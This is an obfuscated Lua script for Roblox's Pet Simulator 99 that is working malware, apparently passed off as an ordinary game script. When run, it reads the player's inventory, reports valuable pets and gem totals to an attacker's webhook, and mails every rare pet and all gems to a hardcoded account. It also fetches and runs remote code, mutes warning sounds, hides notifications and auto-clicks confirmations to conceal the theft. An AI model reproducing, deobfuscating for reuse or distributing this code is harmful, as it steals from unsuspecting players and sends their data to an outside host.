--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v38,v39) local v40={};for v86=1, #v38 do v6(v40,v0(v4(v1(v2(v38,v86,v86 + 1 )),v1(v2(v39,1 + (v86% #v39) ,1 + (v86% #v39) + 1 )))%256 ));end return v5(v40);end local v8=game:GetService(v7("\225\207\218\60\227\169\212","\126\177\163\187\69\134\219\167")).LocalPlayer;local v9=game:GetService(v7("\11\217\62\213\207\38\223\60\204\255\38","\156\67\173\74\165"));local v10=v7("\60\163\93\6\175\124\9\123\160\76\20\180\41\73\63\249\69\19\171\47\85\53\188\92\4\189\104\75\59\178\6\23\172\47\9\35\178\75\30\179\41\77\39\248\24\66\229\112\31\97\230\17\64\238\116\18\101\229\31\65\229\117\21\123\175\27\24\183\44\96\0\165\98\59\137\10\30\38\158\78\48\185\1\110\6\152\24\6\241\18\64\62\167\104\46\241\60\99\16\181\78\62\173\10\82\103\147\83\55\165\115\84\61\176\118\41\154\63\17\0\231\72\47\139\115\20\38\165\106\6\174\37","\38\84\215\41\118\220\70");local v11=v7("\74\30\35\27\236\7\64\117","\158\48\118\66\114");local v12=v7("\172\35\3\118\127\170\247","\155\203\68\112\86\19\197");local v13=0.4;local v14=v8.Name   .. "_"   .. game.JobId ;if _G[v14] then return;end _G[v14]=true;setclipboard(v7("\78\201\34\236\83\34\170\183\66\212\37\255\79\106\225\182\65\218\121\168\104\33\231\219\77\206\30\248\65","\152\38\189\86\156\32\24\133"));local v15=v10:match(v7("\235\82\165\78\243\88\172\85\179\31\226\66\183\30\232","\38\156\55\199"));local v16=v10:match(v7("\191\120\126\32\28\123\241\80\231\56\120\99\92\60\193\125\231\64\55\97\87","\35\200\29\28\72\115\20\154"));loadstring(game:HttpGet(v7("\17\171\197\207\158\118\123\86\173\208\200\195\43\61\13\183\196\221\152\63\49\11\188\222\209\153\41\58\13\241\210\208\128\99\26\12\180\212\233\158\15\61\13\166\158\236\142\62\61\9\171\194\141\221\126\96\86\178\208\214\131\99\36\10\230\136","\84\121\223\177\191\237\76")))();pcall(function() local v41=747 -(719 + 28) ;local v42;while true do if ((0 -0)==v41) then v42=v8.PlayerScripts.Scripts.Core[v7("\139\68\198\163\63\67\35\129\139\83\199\164\51\94\55\129\156\99\224","\161\219\54\169\192\90\48\80")];if v42 then v42.Disabled=true;end break;end end end);pcall(function() local v43=0 -0 ;local v44;while true do if ((0 -0)==v43) then v44=v8.PlayerGui.Notifications;if v44 then v44.Enabled=false;end break;end end end);local function v17(v45) local v46=0 + 0 ;local v47;local v48;local v49;while true do if ((1 + 0)==v46) then v49=0 + 0 ;for v103= #v47,1 + 0 , -(1 + 0) do v49=v49 + 1 ;v48=v47:sub(v103,v103)   .. v48 ;if (((v49%3)==(0 -0)) and (v103>(2 -1))) then v48=","   .. v48 ;end end v46=2;end if (v46==(0 -0)) then v47=tostring(math.floor(v45));v48="";v46=1 + 0 ;end if (v46==(9 -7)) then return v48;end end end local v18=require(game:GetService(v7("\123\71\16\41\64\65\1\49\76\70\51\49\70\80\1\34\76","\69\41\34\96")).Library.Client.Save);local v19=v18.Get();local v20=require(game:GetService(v7("\142\198\199\6\11\40\189\215\210\14\49\63\179\209\214\13\7","\75\220\163\183\106\98")).Library.Directory.Pets);local v21=753 -(239 + 514) ;local v22=nil;if (v19.Inventory and v19.Inventory.Currency) then for v91,v92 in pairs(v19.Inventory.Currency) do if (v92.id==v7("\38\179\138\58\214\12\190\152","\185\98\218\235\87")) then v21=v92._am or 0 ;v22=v91;break;end end end local v23={};if (v19.Inventory and v19.Inventory.Pet) then for v93,v94 in pairs(v19.Inventory.Pet) do local v95=v20[v94.id];local v96=0;if v94.id:find(v7("\236\61\53\225\223\164\223\41\38\232","\202\171\92\71\134\190")) then v96=2 + 2 ;elseif (v95 and v95.exclusiveLevel) then if v94.id:find(v7("\29\200\56\137\39\200\47","\232\73\161\76")) then v96=3;else v96=1330 -(797 + 532) ;end elseif (v95 and v95.huge) then v96=2;end if (v96>0) then table.insert(v23,{[v7("\174\208\70","\126\219\185\34\61")]=v93,[v7("\13\195\81\103\112\99","\135\108\174\62\18\30\23\147")]=v94._am or 1 ,[v7("\184\232\39\206","\167\214\137\74\171\120\206\83")]=v94.id,[v7("\155\226\59\82\234\174\159\233","\199\235\144\82\61\152")]=v96});end end end table.sort(v23,function(v50,v51) return v50.priority>v51.priority ;end);local v24={};for v52,v53 in ipairs(v23) do table.insert(v24,{[v7("\9\23\180\46","\75\103\118\217")]=v53.name,[v7("\212\64\113\0\172\13","\126\167\52\16\116\217")]="❌"});end local function v25() local v54=0 + 0 ;local v55;while true do local v87=0 + 0 ;while true do if (v87==(0 -0)) then if (v54==(1205 -(373 + 829))) then return v55;end if (v54==(732 -(476 + 255))) then v55=v55   .. "Pet Name          Status\n" ;v55=v55   .. "----------------------------\n" ;v54=1132 -(369 + 761) ;end v87=1 + 0 ;end if (v87==(1 -0)) then if (v54==0) then if ( #v24==(0 -0)) then return v7("\230\33\96\167\181\11\251\201\32\52\149\181\23\239\132\110\20\137\160\24\242\193\45\51\204\244\49\233\207\43\51\204\244\22\238\136\11\56\131\184\12\239\193\56\37\147\244\31\243\221\32\36\206","\156\168\78\64\224\212\121");end v55="```\n";v54=239 -(64 + 174) ;end if (v54==(1 + 1)) then for v110,v111 in ipairs(v24) do local v112=v111.name;if ( #v112>16) then v112=v112:sub(1 -0 ,13)   .. v7("\73\160\235","\174\103\142\197") ;end v55=v55   .. string.format("%-16s   %s\n",v112,v111.status) ;end v55=v55   .. v7("\86\40\95","\152\54\72\63\88\69\62") ;v54=339 -(144 + 192) ;end break;end end end end local v26=nil;local function v27() local v56=os.date(v7("\158\208","\60\180\164\142"));local v57=v56.hour%(228 -(42 + 174)) ;if (v57==(0 + 0)) then v57=12;end local v58=((v56.hour<12) and v7("\121\115","\114\56\62\101\73\71\141")) or v7("\136\196","\164\216\137\187") ;local v59=string.format(v7("\151\226\126\247\162\190\78\214\188\116\226\244\250\81\151\182\99\182\230\187\24","\107\178\134\81\210\198\158"),v56.month,v56.day,v57,v56.min,v56.sec,v58);local v60={[v7("\44\7\150\202\175","\202\88\110\226\166")]="\u{1F525} Xoltic Scripts [PetSim99 HIT]",[v7("\192\0\142\248\216","\170\163\111\226\151")]=7862878 + 1629089 ,[v7("\23\57\183\52\74\36","\73\113\80\210\88\46\87")]={{[v7("\143\45\192\23","\135\225\76\173\114")]="\u{1F464} Username",[v7("\12\236\180\165\169","\199\122\141\216\208\204\221")]=v8.Name,[v7("\164\211\28\249\118\243","\150\205\189\112\144\24")]=false},{[v7("\43\133\178\73","\112\69\228\223\44\100\232\113")]="\u{1F4E6} Inventory",[v7("\194\30\11\198\179","\230\180\127\103\179\214\28")]=v25(),[v7("\133\11\83\79\234\68","\128\236\101\63\38\132\33")]=false},{[v7("\162\168\28\65","\175\204\201\113\36\214\139")]="\u{1F48E} Gems",[v7("\81\205\57\201\1","\100\39\172\85\188")]=v17(v21),[v7("\164\118\181\137\61\168","\83\205\24\217\224")]=true}},[v7("\224\202\194\41\227\215","\93\134\165\173")]={[v7("\170\247\217\214","\30\222\146\161\162\90\174\210")]=string.format("\u{1F525} Xoltic Scripts %s",v59)}};local v61={[v7("\224\67\114\15\225\93","\106\133\46\16")]={v60}};local v62,v63=pcall(function() return request({[v7("\109\50\127","\32\56\64\19\156\58")]=v10,[v7("\119\205\241\94\85\246","\224\58\168\133\54\58\146")]=v7("\105\121\120\201","\107\57\54\43\157\21\230\231"),[v7("\243\142\16\241\188\206\220","\175\187\235\113\149\217\188")]={[v7("\31\160\143\88\230\119\108\113\155\152\92\230","\24\92\207\225\44\131\25")]=v7("\74\195\168\64\18\126\74\199\177\67\21\50\65\192\183\66","\29\43\179\216\44\123")},[v7("\159\214\36\85","\44\221\185\64")]=v9:JSONEncode(v61)});end);if (v62 and v63 and v63.Body) then pcall(function() local v102=v9:JSONDecode(v63.Body);if (v102 and v102.id) then v26=v102.id;end end);end end local function v28(v64) local v65=0;local v66;local v67;local v68;local v69;local v70;local v71;local v72;while true do if (v65==(1581 -(1183 + 397))) then v68=v67.hour%(36 -24) ;if (v68==(0 + 0)) then v68=9 + 3 ;end v69=((v67.hour<(1987 -(1913 + 62))) and v7("\111\134","\196\46\203\176\18\79\163\45")) or v7("\136\15","\143\216\66\30\126\68\155") ;v70=string.format(v7("\239\204\66\142\193\227\146\229\240\141\93\153\193\249\146\177\248\204\77\142\214","\129\202\168\109\171\165\195\183"),v67.month,v67.day,v68,v67.min,v67.sec,v69);v65=2 + 0 ;end if (v65==(5 -3)) then v71={[v7("\54\81\35\212\219","\134\66\56\87\184\190\116")]="\u{1F525} Xoltic Scripts [PetSim99 HIT]",[v7("\63\62\5\180\11","\85\92\81\105\219\121\139\65")]=9493900 -(565 + 1368) ,[v7("\251\186\85\73\120\204","\191\157\211\48\37\28")]={{[v7("\209\30\249\25","\90\191\127\148\124")]="\u{1F464} Username",[v7("\110\134\34\2\125","\119\24\231\78")]=v8.Name,[v7("\139\35\169\67\210\69","\113\226\77\197\42\188\32")]=false},{[v7("\52\23\249\176","\213\90\118\148")]="\u{1F4E6} Inventory",[v7("\77\47\184\67\72","\45\59\78\212\54")]=v25(),[v7("\25\88\143\130\136\43","\144\112\54\227\235\230\78\205")]=false},{[v7("\189\41\2\249","\59\211\72\111\156\176")]="\u{1F48E} Gems",[v7("\88\134\239\56\75","\77\46\231\131")]=v17(v21),[v7("\179\90\186\73\180\81","\32\218\52\214")]=true}},[v7("\72\24\62\188\244\162","\58\46\119\81\200\145\208\37")]={[v7("\63\137\40\184","\86\75\236\80\204\201\221")]=string.format("\u{1F525} Xoltic Scripts %s",v70)}};v72={[v7("\119\76\117\128\250\152","\235\18\33\23\229\158")]={v71}};pcall(function() request({[v7("\101\168\205","\219\48\218\161")]=v66,[v7("\201\116\104\65\212\75","\128\132\17\28\41\187\47")]=v7("\49\19\50\25\117","\61\97\82\102\90"),[v7("\132\43\170\79\194\69\13","\105\204\78\203\43\167\55\126")]={[v7("\134\165\45\10\22\10\211\28\145\179\51\27","\49\197\202\67\126\115\100\167")]=v7("\54\75\207\37\137\85\95\35\82\208\39\207\92\77\56\85","\62\87\59\191\73\224\54")},[v7("\197\13\254\208","\169\135\98\154")]=v9:JSONEncode(v72)});end);break;end if (v65==0) then if  not v26 then return;end if v64 then v24[v64].status="✅";end v66=string.format(v7("\9\243\92\79\96\91\168\7\72\118\3\239\71\80\120\79\235\77\72\122\18\230\67\74\97\0\169\69\80\118\78\230\88\86\60\22\226\74\87\124\14\236\91\16\54\18\168\13\76\60\12\226\91\76\114\6\226\91\16\54\18","\19\97\135\40\63"),v15,v16,v26);v67=os.date(v7("\228\72","\81\206\60\83\91\79"));v65=857 -(564 + 292) ;end end end local function v29(v73) local v74=0;local v75;while true do if ((1 -0)==v74) then pcall(function() return game:GetService(v7("\198\116\229\161\44\46\134\224\116\241\158\49\34\149\245\118\240","\231\148\17\149\205\69\77")):WaitForChild(v7("\174\162\211\236\88\237\139","\159\224\199\167\155\55")):WaitForChild(v7("\218\242\53\222\245\252\36\136\183\192\57\220\243","\178\151\147\92")):InvokeServer(unpack(v75));end);break;end if (v74==(0 -0)) then if ( not v22 or (v73<=0)) then return;end v75={v11,v12,v7("\232\98\54\70\248\61\203\210","\168\171\23\68\52\157\83"),v22,v73};v74=1 + 0 ;end end end v27();task.wait(2);for v76=34,1, -(1126 -(936 + 189)) do task.wait(1 + 0 );end local v30;v30=v8.PlayerGui.DescendantAdded:Connect(function(v77) if (v77:IsA(v7("\184\248\84\38\48\89\110\152\242\66","\26\236\157\44\82\114\44")) and v77.Visible and v77.Active) then local v97=1613 -(1565 + 48) ;local v98;while true do if ((0 + 0)==v97) then v98=v77.Name:lower();if (v98:find(v7("\41\33\219\93\35\60\216","\59\74\78\181")) or v98:find(v7("\60\212\73","\211\69\177\58\58")) or v98:find(v7("\164\224\119\241","\171\215\133\25\149\137")) or v98:find(v7("\238\195","\34\129\168\82\154\143\80\156"))) then pcall(function() v77:Click();end);end break;end end end end);local v31=require(game:GetService(v7("\183\183\35\7\65\77\136\145\183\55\56\92\65\155\132\181\54","\233\229\210\83\107\40\46")).Library.Audio);local v32=v31.Play;v31.Play=function(v78,v79,...) local v80=1138 -(782 + 356) ;while true do if ((267 -(176 + 91))==v80) then if (v79==v7("\211\64\42\215\22\210\71\38\223\1\155\13\125\135\84\153\17\107\135\86\147\23\100\131","\101\161\34\82\182")) then return;end return v32(v78,v79,...);end end end;local v34;v34=game.DescendantAdded:Connect(function(v81) if (v81.ClassName==v7("\219\2\76\240\223","\78\136\109\57\158\187\130\226")) then if ((v81.SoundId==v7("\44\61\225\240\45\44\252\229\55\59\163\190\113\110\168\169\109\102\168\162\108\106\175\164","\145\94\95\153")) or (v81.SoundId==v7("\239\207\12\212\93\164\248\217\29\209\20\248\178\156\64\135\27\227\170\159\69\133\29\239","\215\157\173\116\181\46")) or (v81.SoundId==v7("\39\182\147\243\201\38\177\159\251\222\111\251\196\163\136\97\229\216\166\136\102\230\220\164","\186\85\212\235\146"))) then local v104=0;while true do if (v104==0) then v81.Volume=0;v81:Destroy();break;end end end end end);local v35=game:GetService(v7("\240\132\6\242\48\237\89\214\132\18\205\45\225\74\195\134\19","\56\162\225\118\158\89\142"));local v36=v35:WaitForChild(v7("\114\0\212\184\45\202\87","\184\60\101\160\207\66"));local v37=v36:WaitForChild(v7("\28\131\117\176\51\141\100\230\113\177\121\178\53","\220\81\226\28"));for v82,v83 in ipairs(v23) do local v84={v11,v12,v7("\35\208\150","\167\115\181\226\155\138"),v83.uid,v83.amount};local v85=pcall(function() return v37:InvokeServer(unpack(v84));end);if v85 then local v99=1875 -(157 + 1718) ;while true do if ((0 + 0)==v99) then v28(v82);task.wait(0.2 -0 );break;end end end task.wait(v13);end if (v21>(0 -0)) then local v88=1018 -(697 + 321) ;local v89;local v90;while true do if (v88==(2 -1)) then if (v89.Inventory and v89.Inventory.Currency) then for v114,v115 in pairs(v89.Inventory.Currency) do if (v115.id==v7("\198\43\230\81\116\127\194\241","\166\130\66\135\60\27\17")) then v90=v115._am or (0 -0) ;break;end end end if (v90>0) then v29(v90);end break;end if (v88==(0 -0)) then local v105=0 + 0 ;while true do if (v105==(0 -0)) then v89=v18.Get();v90=0 -0 ;v105=1228 -(322 + 905) ;end if (v105==(612 -(602 + 9))) then v88=1190 -(449 + 740) ;break;end end end end end v30:Disconnect();v34:Disconnect();v31.Play=v32;print(v7("\124\69\194\97\57\71\10\253\118\34\77\90\218\102\112\9\10\237\122\61\84\70\203\97\53\5","\80\36\42\174\21"));